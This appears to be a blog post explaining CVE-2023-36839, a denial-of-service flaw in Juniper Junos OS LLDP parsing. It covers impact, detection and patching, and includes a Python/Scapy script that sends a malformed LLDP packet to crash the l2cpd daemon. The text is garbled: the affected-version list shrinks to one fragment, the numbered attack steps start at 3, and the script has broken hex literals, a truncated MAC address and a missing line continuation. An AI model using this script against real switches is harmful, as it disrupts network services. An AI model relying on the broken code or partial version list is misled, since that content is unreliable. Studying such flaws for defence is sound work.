---
*Published: June 2024*
*Author: [RedteamAI]*
What is CVE-2023-36839?
CVE-2023-36839 describes a critical vulnerability in Juniper Networks Junos OS and Junos OS Evolved affecting the Layer-2 control protocols daemon (l2cpd). This issue is due to improper validation of LLDP packet input. An attacker with access to the local Layer-2 network (i.e., adjacent network access) can send malformed Link Layer Discovery Protocol (LLDP) packets to crash the daemon, leading to a Denial of Service (DoS) condition.
No authentication is required for exploitation. This means anyone connected to the same LAN, or with access to a trunk port, can attack impacted systems.
Why Does It Matter?
LLDP plays a crucial role in network device discovery and supports features like PoE (Power over Ethernet) and VoIP device recognition. If l2cpd crashes:
- Spanning Tree Protocols (STP, RSTP, MSTP, VSTP) will be reinitialized, possibly briefly disconnecting or looping the network.
- MVRP and ERP processes are impacted, potentially affecting VLAN registrations or Ethernet ring protection.
Services that rely on LLDP (PoE, VoIP devices, etc.) may stop functioning or become unreliable.
If telemetry polling is active when the malicious packet arrives, exploitation is even easier.
22.4 < 22.4R1-S1-EVO
*If your device is running any of these versions, you are at risk.*
How the Attack Works
The flaw lies in how Junos' l2cpd daemon parses certain fields inside LLDP packets. Due to improper validation of input quantity, specially crafted packets can trigger an out-of-bounds condition, crashing l2cpd.
Send malformed LLDP packets targeting the vulnerable Juniper device's LLDP listener.
3. When telemetry polling is taking place (common in monitored networks), the vulnerability is triggered faster.
Let's see how easy it is to craft and send a potentially harmful packet using Python and Scapy
from scapy.all import *
from scapy.contrib.lldp import *
# Malicious field: Send an excessive or malformed TLV quantity
malicious_tlv = LLDPDUEndOfLLDPDU() # TLV with invalid parameters
# Ethernet frame for LLDP (EtherType x88cc)
pkt = Ether(dst="01:80:C2:00:00:E", type=x88cc) / LLDPDUChassisId(subtype=4, id="AAAA") \
/ LLDPDUPortId(subtype=5, id="BBBB") \
/ LLDPDUTimeToLive(ttl=120) \
/ LLDPDUOrgSpecific(oui=x00120f, subtype=1, info=b'A'*512) # Overlong info field
/ malicious_tlv # Potentially malformed TLV
# Send LLDP packet to the default multicast LLDP address
sendp(pkt, iface="eth", count=1)
print("[*] Malicious LLDP packet sent!")
Note:
This is a conceptual demonstration; to create effective malformed packets, exact TLV structure according to the l2cpd parser must be known. But even overlong fields or an excessive number of TLVs in a single PDU (LLDPDU) may trigger the bug.
*Attack triggers l2cpd crash on a core switch.*
- *STP/RSTP/MSTP re-initialize rapidly.*
Unexpected STP (Spanning Tree) topology changes or protocol reinitializations.
- Network events coinciding with malformed/suspicious LLDP traffic (use Wireshark/tshark filters: eth.dst == 01:80:C2:00:00:E).
References
- Juniper Security Advisory for CVE-2023-36839
- NVD CVE Detail
- Scapy LLDP Documentation
- LLDP Overview (Wikipedia)
Final Thoughts
CVE-2023-36839 underlines how important it is to keep network firmware up-to-date and limit Layer-2 exposure to trusted users and devices. Even commonly trusted protocols like LLDP can become attack surfaces.
Admins should patch ASAP and actively monitor for LLDP anomalies.
*This article was written exclusively for cybersecurity practitioners and red teamers. If you found this content useful, consider sharing with your team!*
Timeline
Published on: 10/12/2023 23:15:10 UTC
Last modified on: 10/16/2023 19:27:00 UTC